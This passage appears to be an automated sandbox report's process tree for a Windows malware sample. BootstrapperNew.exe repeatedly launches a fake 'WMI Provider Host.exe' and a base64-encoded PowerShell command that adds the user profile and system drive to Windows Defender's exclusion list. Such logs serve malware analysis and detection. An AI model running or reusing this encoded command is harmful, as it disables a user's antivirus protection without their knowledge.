        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        62⤵
        
        PID:6148
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        62⤵
        
        PID:1484
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        62⤵
        
        PID:5816
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        63⤵
        
        PID:6864
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        63⤵
        
        PID:5892
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        63⤵
        
        PID:7084
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        64⤵
        
        PID:7072
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        64⤵
        
        PID:4716
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        64⤵
        
        PID:6428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        65⤵
        
        PID:5484
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        65⤵
        
        PID:5900
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        65⤵
        
        PID:5856
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        66⤵
        
        PID:6444
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        66⤵
        
        PID:5316
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        66⤵
        
        PID:3604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        67⤵
        
        PID:5500
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        67⤵
        
        PID:6688
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        67⤵
        
        PID:2384
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        68⤵
        
        PID:3068
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        68⤵
        
        PID:5164
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        68⤵
        
        PID:2192
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        69⤵
        
        PID:1292
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        69⤵
        
        PID:6868
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        69⤵
        
        PID:552
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        70⤵
        
        PID:2848
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        70⤵
        
        PID:5492
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        70⤵
        
        PID:5856
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        71⤵
        
        PID:5704
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        71⤵
        
        PID:6836
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        71⤵
        
        PID:5148
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        72⤵
        
        PID:7088
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        72⤵
        
        PID:3736
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        72⤵
        
        PID:7004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        73⤵
        
        PID:6552
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        73⤵
        
        PID:2192
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        73⤵
        
        PID:3328
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        74⤵
        
        PID:4684
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        74⤵
        
        PID:6316
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        74⤵
        
        PID:1916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        75⤵
        
        PID:1900
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        75⤵
        
        PID:3228
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        75⤵
        
        PID:3756
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        76⤵
        
        PID:4244
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        76⤵
        
        PID:1308
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        76⤵
        
        PID:2080
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        77⤵
        
        PID:6088
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        77⤵
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        77⤵
        
        PID:2704
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        78⤵
        
        PID:4508
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        78⤵
        
        PID:3012
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        78⤵
        
        PID:2544
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        79⤵
        
        PID:552
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        79⤵
        
        PID:6020
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        79⤵
        
        PID:6944
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        80⤵
        
        PID:6116
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        80⤵
        
        PID:2192
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        80⤵
        
        PID:4088
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        81⤵
        
        PID:6356
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        81⤵
        
        PID:5440
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        81⤵
        
        PID:5716
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        82⤵
        
        PID:6828
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        82⤵
        
        PID:3348
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        82⤵
        
        PID:4788
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        83⤵
        
        PID:4940
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        83⤵
        
        PID:5288
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        83⤵
        
        PID:3320
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        84⤵
        
        PID:5756
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        84⤵
        
        PID:4880
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        84⤵
        
        PID:7136
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        85⤵
        
        PID:744
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        85⤵
        
        PID:6228
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        85⤵
        
        PID:6208
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        86⤵
        
        PID:776
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        86⤵
        
        PID:5824
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        86⤵
        
        PID:1380
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        87⤵
        
        PID:6256
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        87⤵
        
        PID:5184
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        87⤵
        
        PID:5176
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        88⤵
        
        PID:5432
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        88⤵
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        88⤵
        
        PID:3376
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        89⤵
        
        PID:6512
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        89⤵
        
        PID:3012
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        89⤵
        
        PID:7004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        90⤵
        
        PID:3924
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        90⤵
        
        PID:7160
        
